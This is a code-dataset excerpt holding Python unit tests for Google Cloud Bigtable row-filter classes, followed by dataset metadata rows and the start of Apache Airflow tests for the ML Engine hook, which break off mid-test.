self.assertEqual(row_filter1, row_filter2)
def test_to_pb(self):
from gcloud.bigtable.row_filters import TimestampRange
range_ = TimestampRange()
row_filter = self._makeOne(range_)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(
timestamp_range_filter=_TimestampRangePB())
self.assertEqual(pb_val, expected_pb)
class TestColumnRangeFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import ColumnRangeFilter
return ColumnRangeFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor_defaults(self):
column_family_id = object()
row_filter = self._makeOne(column_family_id)
self.assertTrue(row_filter.column_family_id is column_family_id)
self.assertEqual(row_filter.start_column, None)
self.assertEqual(row_filter.end_column, None)
self.assertTrue(row_filter.inclusive_start)
self.assertTrue(row_filter.inclusive_end)
def test_constructor_explicit(self):
column_family_id = object()
start_column = object()
end_column = object()
inclusive_start = object()
inclusive_end = object()
row_filter = self._makeOne(
column_family_id,
start_column=start_column,
end_column=end_column,
inclusive_start=inclusive_start,
inclusive_end=inclusive_end)
self.assertTrue(row_filter.column_family_id is column_family_id)
self.assertTrue(row_filter.start_column is start_column)
self.assertTrue(row_filter.end_column is end_column)
self.assertTrue(row_filter.inclusive_start is inclusive_start)
self.assertTrue(row_filter.inclusive_end is inclusive_end)
def test_constructor_bad_start(self):
column_family_id = object()
self.assertRaises(ValueError, self._makeOne,
column_family_id, inclusive_start=True)
def test_constructor_bad_end(self):
column_family_id = object()
self.assertRaises(ValueError, self._makeOne,
column_family_id, inclusive_end=True)
def test___eq__(self):
column_family_id = object()
start_column = object()
end_column = object()
inclusive_start = object()
inclusive_end = object()
row_filter1 = self._makeOne(column_family_id,
start_column=start_column,
end_column=end_column,
inclusive_start=inclusive_start,
inclusive_end=inclusive_end)
row_filter2 = self._makeOne(column_family_id,
start_column=start_column,
end_column=end_column,
inclusive_start=inclusive_start,
inclusive_end=inclusive_end)
self.assertEqual(row_filter1, row_filter2)
def test___eq__type_differ(self):
column_family_id = object()
row_filter1 = self._makeOne(column_family_id)
row_filter2 = object()
self.assertNotEqual(row_filter1, row_filter2)
def test_to_pb(self):
column_family_id = u'column-family-id'
row_filter = self._makeOne(column_family_id)
col_range_pb = _ColumnRangePB(family_name=column_family_id)
expected_pb = _RowFilterPB(column_range_filter=col_range_pb)
self.assertEqual(row_filter.to_pb(), expected_pb)
def test_to_pb_inclusive_start(self):
column_family_id = u'column-family-id'
column = b'column'
row_filter = self._makeOne(column_family_id, start_column=column)
col_range_pb = _ColumnRangePB(
family_name=column_family_id,
start_qualifier_closed=column,
)
expected_pb = _RowFilterPB(column_range_filter=col_range_pb)
self.assertEqual(row_filter.to_pb(), expected_pb)
def test_to_pb_exclusive_start(self):
column_family_id = u'column-family-id'
column = b'column'
row_filter = self._makeOne(column_family_id, start_column=column,
inclusive_start=False)
col_range_pb = _ColumnRangePB(
family_name=column_family_id,
start_qualifier_open=column,
)
expected_pb = _RowFilterPB(column_range_filter=col_range_pb)
self.assertEqual(row_filter.to_pb(), expected_pb)
def test_to_pb_inclusive_end(self):
column_family_id = u'column-family-id'
column = b'column'
row_filter = self._makeOne(column_family_id, end_column=column)
col_range_pb = _ColumnRangePB(
family_name=column_family_id,
end_qualifier_closed=column,
)
expected_pb = _RowFilterPB(column_range_filter=col_range_pb)
self.assertEqual(row_filter.to_pb(), expected_pb)
def test_to_pb_exclusive_end(self):
column_family_id = u'column-family-id'
column = b'column'
row_filter = self._makeOne(column_family_id, end_column=column,
inclusive_end=False)
col_range_pb = _ColumnRangePB(
family_name=column_family_id,
end_qualifier_open=column,
)
expected_pb = _RowFilterPB(column_range_filter=col_range_pb)
self.assertEqual(row_filter.to_pb(), expected_pb)
class TestValueRegexFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import ValueRegexFilter
return ValueRegexFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
regex = b'value-regex'
row_filter = self._makeOne(regex)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(value_regex_filter=regex)
self.assertEqual(pb_val, expected_pb)
class TestValueRangeFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import ValueRangeFilter
return ValueRangeFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor_defaults(self):
row_filter = self._makeOne()
self.assertEqual(row_filter.start_value, None)
self.assertEqual(row_filter.end_value, None)
self.assertTrue(row_filter.inclusive_start)
self.assertTrue(row_filter.inclusive_end)
def test_constructor_explicit(self):
start_value = object()
end_value = object()
inclusive_start = object()
inclusive_end = object()
row_filter = self._makeOne(start_value=start_value,
end_value=end_value,
inclusive_start=inclusive_start,
inclusive_end=inclusive_end)
self.assertTrue(row_filter.start_value is start_value)
self.assertTrue(row_filter.end_value is end_value)
self.assertTrue(row_filter.inclusive_start is inclusive_start)
self.assertTrue(row_filter.inclusive_end is inclusive_end)
def test_constructor_bad_start(self):
self.assertRaises(ValueError, self._makeOne, inclusive_start=True)
def test_constructor_bad_end(self):
self.assertRaises(ValueError, self._makeOne, inclusive_end=True)
def test___eq__(self):
start_value = object()
end_value = object()
inclusive_start = object()
inclusive_end = object()
row_filter1 = self._makeOne(start_value=start_value,
end_value=end_value,
inclusive_start=inclusive_start,
inclusive_end=inclusive_end)
row_filter2 = self._makeOne(start_value=start_value,
end_value=end_value,
inclusive_start=inclusive_start,
inclusive_end=inclusive_end)
self.assertEqual(row_filter1, row_filter2)
def test___eq__type_differ(self):
row_filter1 = self._makeOne()
row_filter2 = object()
self.assertNotEqual(row_filter1, row_filter2)
def test_to_pb(self):
row_filter = self._makeOne()
expected_pb = _RowFilterPB(
value_range_filter=_ValueRangePB())
self.assertEqual(row_filter.to_pb(), expected_pb)
def test_to_pb_inclusive_start(self):
value = b'some-value'
row_filter = self._makeOne(start_value=value)
val_range_pb = _ValueRangePB(start_value_closed=value)
expected_pb = _RowFilterPB(value_range_filter=val_range_pb)
self.assertEqual(row_filter.to_pb(), expected_pb)
def test_to_pb_exclusive_start(self):
value = b'some-value'
row_filter = self._makeOne(start_value=value, inclusive_start=False)
val_range_pb = _ValueRangePB(start_value_open=value)
expected_pb = _RowFilterPB(value_range_filter=val_range_pb)
self.assertEqual(row_filter.to_pb(), expected_pb)
def test_to_pb_inclusive_end(self):
value = b'some-value'
row_filter = self._makeOne(end_value=value)
val_range_pb = _ValueRangePB(end_value_closed=value)
expected_pb = _RowFilterPB(value_range_filter=val_range_pb)
self.assertEqual(row_filter.to_pb(), expected_pb)
def test_to_pb_exclusive_end(self):
value = b'some-value'
row_filter = self._makeOne(end_value=value, inclusive_end=False)
val_range_pb = _ValueRangePB(end_value_open=value)
expected_pb = _RowFilterPB(value_range_filter=val_range_pb)
self.assertEqual(row_filter.to_pb(), expected_pb)
class Test_CellCountFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import _CellCountFilter
return _CellCountFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor(self):
num_cells = object()
row_filter = self._makeOne(num_cells)
self.assertTrue(row_filter.num_cells is num_cells)
def test___eq__type_differ(self):
num_cells = object()
row_filter1 = self._makeOne(num_cells)
row_filter2 = object()
self.assertNotEqual(row_filter1, row_filter2)
def test___eq__same_value(self):
num_cells = object()
row_filter1 = self._makeOne(num_cells)
row_filter2 = self._makeOne(num_cells)
self.assertEqual(row_filter1, row_filter2)
def test___ne__same_value(self):
num_cells = object()
row_filter1 = self._makeOne(num_cells)
row_filter2 = self._makeOne(num_cells)
comparison_val = (row_filter1 != row_filter2)
self.assertFalse(comparison_val)
class TestCellsRowOffsetFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import CellsRowOffsetFilter
return CellsRowOffsetFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
num_cells = 76
row_filter = self._makeOne(num_cells)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(
cells_per_row_offset_filter=num_cells)
self.assertEqual(pb_val, expected_pb)
class TestCellsRowLimitFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import CellsRowLimitFilter
return CellsRowLimitFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
num_cells = 189
row_filter = self._makeOne(num_cells)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(
cells_per_row_limit_filter=num_cells)
self.assertEqual(pb_val, expected_pb)
class TestCellsColumnLimitFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import CellsColumnLimitFilter
return CellsColumnLimitFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
num_cells = 10
row_filter = self._makeOne(num_cells)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(
cells_per_column_limit_filter=num_cells)
self.assertEqual(pb_val, expected_pb)
class TestStripValueTransformerFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import StripValueTransformerFilter
return StripValueTransformerFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
flag = True
row_filter = self._makeOne(flag)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(strip_value_transformer=flag)
self.assertEqual(pb_val, expected_pb)
class TestApplyLabelFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import ApplyLabelFilter
return ApplyLabelFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor(self):
label = object()
row_filter = self._makeOne(label)
self.assertTrue(row_filter.label is label)
def test___eq__type_differ(self):
label = object()
row_filter1 = self._makeOne(label)
row_filter2 = object()
self.assertNotEqual(row_filter1, row_filter2)
def test___eq__same_value(self):
label = object()
row_filter1 = self._makeOne(label)
row_filter2 = self._makeOne(label)
self.assertEqual(row_filter1, row_filter2)
def test_to_pb(self):
label = u'label'
row_filter = self._makeOne(label)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(apply_label_transformer=label)
self.assertEqual(pb_val, expected_pb)
class Test_FilterCombination(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import _FilterCombination
return _FilterCombination
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor_defaults(self):
row_filter = self._makeOne()
self.assertEqual(row_filter.filters, [])
def test_constructor_explicit(self):
filters = object()
row_filter = self._makeOne(filters=filters)
self.assertTrue(row_filter.filters is filters)
def test___eq__(self):
filters = object()
row_filter1 = self._makeOne(filters=filters)
row_filter2 = self._makeOne(filters=filters)
self.assertEqual(row_filter1, row_filter2)
def test___eq__type_differ(self):
filters = object()
row_filter1 = self._makeOne(filters=filters)
row_filter2 = object()
self.assertNotEqual(row_filter1, row_filter2)
class TestRowFilterChain(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import RowFilterChain
return RowFilterChain
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
from gcloud.bigtable.row_filters import RowSampleFilter
from gcloud.bigtable.row_filters import StripValueTransformerFilter
row_filter1 = StripValueTransformerFilter(True)
row_filter1_pb = row_filter1.to_pb()
row_filter2 = RowSampleFilter(0.25)
row_filter2_pb = row_filter2.to_pb()
row_filter3 = self._makeOne(filters=[row_filter1, row_filter2])
filter_pb = row_filter3.to_pb()
expected_pb = _RowFilterPB(
chain=_RowFilterChainPB(
filters=[row_filter1_pb, row_filter2_pb],
),
)
self.assertEqual(filter_pb, expected_pb)
def test_to_pb_nested(self):
from gcloud.bigtable.row_filters import CellsRowLimitFilter
from gcloud.bigtable.row_filters import RowSampleFilter
from gcloud.bigtable.row_filters import StripValueTransformerFilter
row_filter1 = StripValueTransformerFilter(True)
row_filter2 = RowSampleFilter(0.25)
row_filter3 = self._makeOne(filters=[row_filter1, row_filter2])
row_filter3_pb = row_filter3.to_pb()
row_filter4 = CellsRowLimitFilter(11)
row_filter4_pb = row_filter4.to_pb()
row_filter5 = self._makeOne(filters=[row_filter3, row_filter4])
filter_pb = row_filter5.to_pb()
expected_pb = _RowFilterPB(
chain=_RowFilterChainPB(
filters=[row_filter3_pb, row_filter4_pb],
),
)
self.assertEqual(filter_pb, expected_pb)
class TestRowFilterUnion(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import RowFilterUnion
return RowFilterUnion
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
from gcloud.bigtable.row_filters import RowSampleFilter
from gcloud.bigtable.row_filters import StripValueTransformerFilter
row_filter1 = StripValueTransformerFilter(True)
row_filter1_pb = row_filter1.to_pb()
row_filter2 = RowSampleFilter(0.25)
row_filter2_pb = row_filter2.to_pb()
row_filter3 = self._makeOne(filters=[row_filter1, row_filter2])
filter_pb = row_filter3.to_pb()
expected_pb = _RowFilterPB(
interleave=_RowFilterInterleavePB(
filters=[row_filter1_pb, row_filter2_pb],
),
)
self.assertEqual(filter_pb, expected_pb)
def test_to_pb_nested(self):
from gcloud.bigtable.row_filters import CellsRowLimitFilter
from gcloud.bigtable.row_filters import RowSampleFilter
from gcloud.bigtable.row_filters import StripValueTransformerFilter
row_filter1 = StripValueTransformerFilter(True)
row_filter2 = RowSampleFilter(0.25)
row_filter3 = self._makeOne(filters=[row_filter1, row_filter2])
row_filter3_pb = row_filter3.to_pb()
row_filter4 = CellsRowLimitFilter(11)
row_filter4_pb = row_filter4.to_pb()
row_filter5 = self._makeOne(filters=[row_filter3, row_filter4])
filter_pb = row_filter5.to_pb()
expected_pb = _RowFilterPB(
interleave=_RowFilterInterleavePB(
filters=[row_filter3_pb, row_filter4_pb],
),
)
self.assertEqual(filter_pb, expected_pb)
class TestConditionalRowFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import ConditionalRowFilter
return ConditionalRowFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor(self):
base_filter = object()
true_filter = object()
false_filter = object()
cond_filter = self._makeOne(base_filter,
true_filter=true_filter,
false_filter=false_filter)
self.assertTrue(cond_filter.base_filter is base_filter)
self.assertTrue(cond_filter.true_filter is true_filter)
self.assertTrue(cond_filter.false_filter is false_filter)
def test___eq__(self):
base_filter = object()
true_filter = object()
false_filter = object()
cond_filter1 = self._makeOne(base_filter,
true_filter=true_filter,
false_filter=false_filter)
cond_filter2 = self._makeOne(base_filter,
true_filter=true_filter,
false_filter=false_filter)
self.assertEqual(cond_filter1, cond_filter2)
def test___eq__type_differ(self):
base_filter = object()
true_filter = object()
false_filter = object()
cond_filter1 = self._makeOne(base_filter,
true_filter=true_filter,
false_filter=false_filter)
cond_filter2 = object()
self.assertNotEqual(cond_filter1, cond_filter2)
def test_to_pb(self):
from gcloud.bigtable.row_filters import CellsRowOffsetFilter
from gcloud.bigtable.row_filters import RowSampleFilter
from gcloud.bigtable.row_filters import StripValueTransformerFilter
row_filter1 = StripValueTransformerFilter(True)
row_filter1_pb = row_filter1.to_pb()
row_filter2 = RowSampleFilter(0.25)
row_filter2_pb = row_filter2.to_pb()
row_filter3 = CellsRowOffsetFilter(11)
row_filter3_pb = row_filter3.to_pb()
row_filter4 = self._makeOne(row_filter1, true_filter=row_filter2,
false_filter=row_filter3)
filter_pb = row_filter4.to_pb()
expected_pb = _RowFilterPB(
condition=_RowFilterConditionPB(
predicate_filter=row_filter1_pb,
true_filter=row_filter2_pb,
false_filter=row_filter3_pb,
),
)
self.assertEqual(filter_pb, expected_pb)
def test_to_pb_true_only(self):
from gcloud.bigtable.row_filters import RowSampleFilter
from gcloud.bigtable.row_filters import StripValueTransformerFilter
row_filter1 = StripValueTransformerFilter(True)
row_filter1_pb = row_filter1.to_pb()
row_filter2 = RowSampleFilter(0.25)
row_filter2_pb = row_filter2.to_pb()
row_filter3 = self._makeOne(row_filter1, true_filter=row_filter2)
filter_pb = row_filter3.to_pb()
expected_pb = _RowFilterPB(
condition=_RowFilterConditionPB(
predicate_filter=row_filter1_pb,
true_filter=row_filter2_pb,
),
)
self.assertEqual(filter_pb, expected_pb)
def test_to_pb_false_only(self):
from gcloud.bigtable.row_filters import RowSampleFilter
from gcloud.bigtable.row_filters import StripValueTransformerFilter
row_filter1 = StripValueTransformerFilter(True)
row_filter1_pb = row_filter1.to_pb()
row_filter2 = RowSampleFilter(0.25)
row_filter2_pb = row_filter2.to_pb()
row_filter3 = self._makeOne(row_filter1, false_filter=row_filter2)
filter_pb = row_filter3.to_pb()
expected_pb = _RowFilterPB(
condition=_RowFilterConditionPB(
predicate_filter=row_filter1_pb,
false_filter=row_filter2_pb,
),
)
self.assertEqual(filter_pb, expected_pb)
def _ColumnRangePB(*args, **kw):
from gcloud.bigtable._generated import (
data_pb2 as data_v2_pb2)
return data_v2_pb2.ColumnRange(*args, **kw)
def _RowFilterPB(*args, **kw):
from gcloud.bigtable._generated import (
data_pb2 as data_v2_pb2)
return data_v2_pb2.RowFilter(*args, **kw)
def _RowFilterChainPB(*args, **kw):
from gcloud.bigtable._generated import (
data_pb2 as data_v2_pb2)
return data_v2_pb2.RowFilter.Chain(*args, **kw)
def _RowFilterConditionPB(*args, **kw):
from gcloud.bigtable._generated import (
data_pb2 as data_v2_pb2)
return data_v2_pb2.RowFilter.Condition(*args, **kw)
def _RowFilterInterleavePB(*args, **kw):
from gcloud.bigtable._generated import (
data_pb2 as data_v2_pb2)
return data_v2_pb2.RowFilter.Interleave(*args, **kw)
def _TimestampRangePB(*args, **kw):
from gcloud.bigtable._generated import (
data_pb2 as data_v2_pb2)
return data_v2_pb2.TimestampRange(*args, **kw)
def _ValueRangePB(*args, **kw):
from gcloud.bigtable._generated import (
data_pb2 as data_v2_pb2)
return data_v2_pb2.ValueRange(*args, **kw)
| 34.631737
| 76
| 0.668569
| 3,949
| 34,701
| 5.497594
| 0.061028
| 0.047628
| 0.040626
| 0.040626
| 0.833118
| 0.804975
| 0.781115
| 0.75836
| 0.733164
| 0.709581
| 0
| 0.013221
| 0.250166
| 34,701
| 1,001
| 77
| 34.666334
| 0.821138
| 0.020201
| 0
| 0.710145
| 0
| 0
| 0.007886
| 0.000647
| 0
| 0
| 0
| 0
| 0.123847
| 1
| 0.177866
| false
| 0.00527
| 0.068511
| 0.031621
| 0.350461
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c29080c554a8c74b920e4e5258149cec28753af
| 40,770
|
py
|
Python
|
tests/gcp/hooks/test_mlengine.py
|
robobario/airflow
|
702005fe35dc5b996a5c5b8d349ed36036472f00
|
[
"Apache-2.0"
] | 1
|
2021-09-16T17:20:00.000Z
|
2021-09-16T17:20:00.000Z
|
tests/gcp/hooks/test_mlengine.py
|
robobario/airflow
|
702005fe35dc5b996a5c5b8d349ed36036472f00
|
[
"Apache-2.0"
] | 20
|
2017-04-18T19:47:46.000Z
|
2020-01-13T04:19:24.000Z
|
tests/gcp/hooks/test_mlengine.py
|
robobario/airflow
|
702005fe35dc5b996a5c5b8d349ed36036472f00
|
[
"Apache-2.0"
] | 2
|
2018-09-15T07:13:01.000Z
|
2021-03-26T07:27:38.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from copy import deepcopy
from unittest import mock
from googleapiclient.errors import HttpError
from airflow import AirflowException
from airflow.gcp.hooks import mlengine as hook
from tests.compat import PropertyMock
from tests.gcp.utils.base_gcp_mock import (
GCP_PROJECT_ID_HOOK_UNIT_TEST, mock_base_gcp_hook_default_project_id,
mock_base_gcp_hook_no_default_project_id,
)
class TestMLEngineHook(unittest.TestCase):
def setUp(self) -> None:
super().setUp()
self.hook = hook.MLEngineHook()
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook._authorize")
@mock.patch("airflow.gcp.hooks.mlengine.build")
def test_mle_engine_client_creation(self, mock_build, mock_authorize):
result = self.hook.get_conn()
self.assertEqual(mock_build.return_value, result)
mock_build.assert_called_with(
'ml', 'v1', http=mock_authorize.return_value, cache_discovery=False
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_version(self, mock_get_conn):
project_id = 'test-project'
model_name = 'test-model'
version_name = 'test-version'
version = {
'name': version_name,
'labels': {'other-label': 'test-value'}
}
version_with_airflow_version = {
'name': 'test-version',
'labels': {
'other-label': 'test-value',
'airflow-version': hook._AIRFLOW_VERSION
}
}
operation_path = 'projects/{}/operations/test-operation'.format(project_id)
model_path = 'projects/{}/models/{}'.format(project_id, model_name)
operation_done = {'name': operation_path, 'done': True}
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
versions.return_value.
create.return_value.
execute.return_value
) = version
(
mock_get_conn.return_value.
projects.return_value.
operations.return_value.
get.return_value.
execute.return_value
) = {'name': operation_path, 'done': True}
create_version_response = self.hook.create_version(
project_id=project_id,
model_name=model_name,
version_spec=deepcopy(version)
)
self.assertEqual(create_version_response, operation_done)
mock_get_conn.assert_has_calls([
mock.call().projects().models().versions().create(
body=version_with_airflow_version,
parent=model_path
),
mock.call().projects().models().versions().create().execute(),
mock.call().projects().operations().get(name=version_name),
], any_order=True)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_version_with_labels(self, mock_get_conn):
project_id = 'test-project'
model_name = 'test-model'
version_name = 'test-version'
version = {'name': version_name}
version_with_airflow_version = {
'name': 'test-version',
'labels': {'airflow-version': hook._AIRFLOW_VERSION}
}
operation_path = 'projects/{}/operations/test-operation'.format(project_id)
model_path = 'projects/{}/models/{}'.format(project_id, model_name)
operation_done = {'name': operation_path, 'done': True}
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
versions.return_value.
create.return_value.
execute.return_value
) = version
(
mock_get_conn.return_value.
projects.return_value.
operations.return_value.
get.return_value.
execute.return_value
) = {'name': operation_path, 'done': True}
create_version_response = self.hook.create_version(
project_id=project_id,
model_name=model_name,
version_spec=deepcopy(version)
)
self.assertEqual(create_version_response, operation_done)
mock_get_conn.assert_has_calls([
mock.call().projects().models().versions().create(
body=version_with_airflow_version,
parent=model_path
),
mock.call().projects().models().versions().create().execute(),
mock.call().projects().operations().get(name=version_name),
], any_order=True)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_set_default_version(self, mock_get_conn):
project_id = 'test-project'
model_name = 'test-model'
version_name = 'test-version'
operation_path = 'projects/{}/operations/test-operation'.format(project_id)
version_path = 'projects/{}/models/{}/versions/{}'.format(project_id, model_name, version_name)
operation_done = {'name': operation_path, 'done': True}
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
versions.return_value.
setDefault.return_value.
execute.return_value
) = operation_done
set_default_version_response = self.hook.set_default_version(
project_id=project_id,
model_name=model_name,
version_name=version_name
)
self.assertEqual(set_default_version_response, operation_done)
mock_get_conn.assert_has_calls([
mock.call().projects().models().versions().setDefault(body={}, name=version_path),
mock.call().projects().models().versions().setDefault().execute()
], any_order=True)
@mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_list_versions(self, mock_get_conn, mock_sleep):
project_id = 'test-project'
model_name = 'test-model'
model_path = 'projects/{}/models/{}'.format(project_id, model_name)
version_names = ['ver_{}'.format(ix) for ix in range(3)]
response_bodies = [
{
'nextPageToken': "TOKEN-{}".format(ix),
'versions': [ver]
} for ix, ver in enumerate(version_names)]
response_bodies[-1].pop('nextPageToken')
pages_requests = [
mock.Mock(**{'execute.return_value': body}) for body in response_bodies
]
versions_mock = mock.Mock(
**{'list.return_value': pages_requests[0], 'list_next.side_effect': pages_requests[1:] + [None]}
)
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
versions.return_value
) = versions_mock
list_versions_response = self.hook.list_versions(
project_id=project_id, model_name=model_name)
self.assertEqual(list_versions_response, version_names)
mock_get_conn.assert_has_calls([
mock.call().projects().models().versions().list(pageSize=100, parent=model_path),
mock.call().projects().models().versions().list().execute(),
] + [
mock.call().projects().models().versions().list_next(
previous_request=pages_requests[i], previous_response=response_bodies[i]
) for i in range(3)
], any_order=True)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_delete_version(self, mock_get_conn):
project_id = 'test-project'
model_name = 'test-model'
version_name = 'test-version'
operation_path = 'projects/{}/operations/test-operation'.format(project_id)
version_path = 'projects/{}/models/{}/versions/{}'.format(project_id, model_name, version_name)
version = {'name': operation_path}
operation_not_done = {'name': operation_path, 'done': False}
operation_done = {'name': operation_path, 'done': True}
(
mock_get_conn.return_value.
projects.return_value.
operations.return_value.
get.return_value.
execute.side_effect
) = [operation_not_done, operation_done]
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
versions.return_value.
delete.return_value.
execute.return_value
) = version
delete_version_response = self.hook.delete_version(
project_id=project_id, model_name=model_name,
version_name=version_name)
self.assertEqual(delete_version_response, operation_done)
mock_get_conn.assert_has_calls([
mock.call().projects().models().versions().delete(name=version_path),
mock.call().projects().models().versions().delete().execute(),
mock.call().projects().operations().get(name=operation_path),
mock.call().projects().operations().get().execute()
], any_order=True)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_model(self, mock_get_conn):
project_id = 'test-project'
model_name = 'test-model'
model = {
'name': model_name,
}
model_with_airflow_version = {
'name': model_name,
'labels': {'airflow-version': hook._AIRFLOW_VERSION}
}
project_path = 'projects/{}'.format(project_id)
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
create.return_value.
execute.return_value
) = model
create_model_response = self.hook.create_model(
project_id=project_id, model=deepcopy(model)
)
self.assertEqual(create_model_response, model)
mock_get_conn.assert_has_calls([
mock.call().projects().models().create(body=model_with_airflow_version, parent=project_path),
mock.call().projects().models().create().execute()
])
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_model_with_labels(self, mock_get_conn):
project_id = 'test-project'
model_name = 'test-model'
model = {
'name': model_name,
'labels': {'other-label': 'test-value'}
}
model_with_airflow_version = {
'name': model_name,
'labels': {
'other-label': 'test-value',
'airflow-version': hook._AIRFLOW_VERSION
}
}
project_path = 'projects/{}'.format(project_id)
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
create.return_value.
execute.return_value
) = model
create_model_response = self.hook.create_model(
project_id=project_id, model=deepcopy(model)
)
self.assertEqual(create_model_response, model)
mock_get_conn.assert_has_calls([
mock.call().projects().models().create(body=model_with_airflow_version, parent=project_path),
mock.call().projects().models().create().execute()
])
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_get_model(self, mock_get_conn):
project_id = 'test-project'
model_name = 'test-model'
model = {'model': model_name}
model_path = 'projects/{}/models/{}'.format(project_id, model_name)
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
get.return_value.
execute.return_value
) = model
get_model_response = self.hook.get_model(
project_id=project_id, model_name=model_name
)
self.assertEqual(get_model_response, model)
mock_get_conn.assert_has_calls([
mock.call().projects().models().get(name=model_path),
mock.call().projects().models().get().execute()
])
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_delete_model(self, mock_get_conn):
project_id = 'test-project'
model_name = 'test-model'
model = {'model': model_name}
model_path = 'projects/{}/models/{}'.format(project_id, model_name)
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
delete.return_value.
execute.return_value
) = model
self.hook.delete_model(
project_id=project_id, model_name=model_name
)
mock_get_conn.assert_has_calls([
mock.call().projects().models().delete(name=model_path),
mock.call().projects().models().delete().execute()
])
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.log")
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_delete_model_when_not_exists(self, mock_get_conn, mock_log):
project_id = 'test-project'
model_name = 'test-model'
model_path = 'projects/{}/models/{}'.format(project_id, model_name)
http_error = HttpError(
resp=mock.MagicMock(status=404, reason="Model not found."),
content=b'Model not found.'
)
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
delete.return_value.
execute.side_effect
) = [http_error]
self.hook.delete_model(
project_id=project_id, model_name=model_name
)
mock_get_conn.assert_has_calls([
mock.call().projects().models().delete(name=model_path),
mock.call().projects().models().delete().execute()
])
mock_log.error.assert_called_once_with('Model was not found: %s', http_error)
@mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_delete_model_with_contents(self, mock_get_conn, mock_sleep):
project_id = 'test-project'
model_name = 'test-model'
model_path = 'projects/{}/models/{}'.format(project_id, model_name)
operation_path = 'projects/{}/operations/test-operation'.format(project_id)
operation_done = {'name': operation_path, 'done': True}
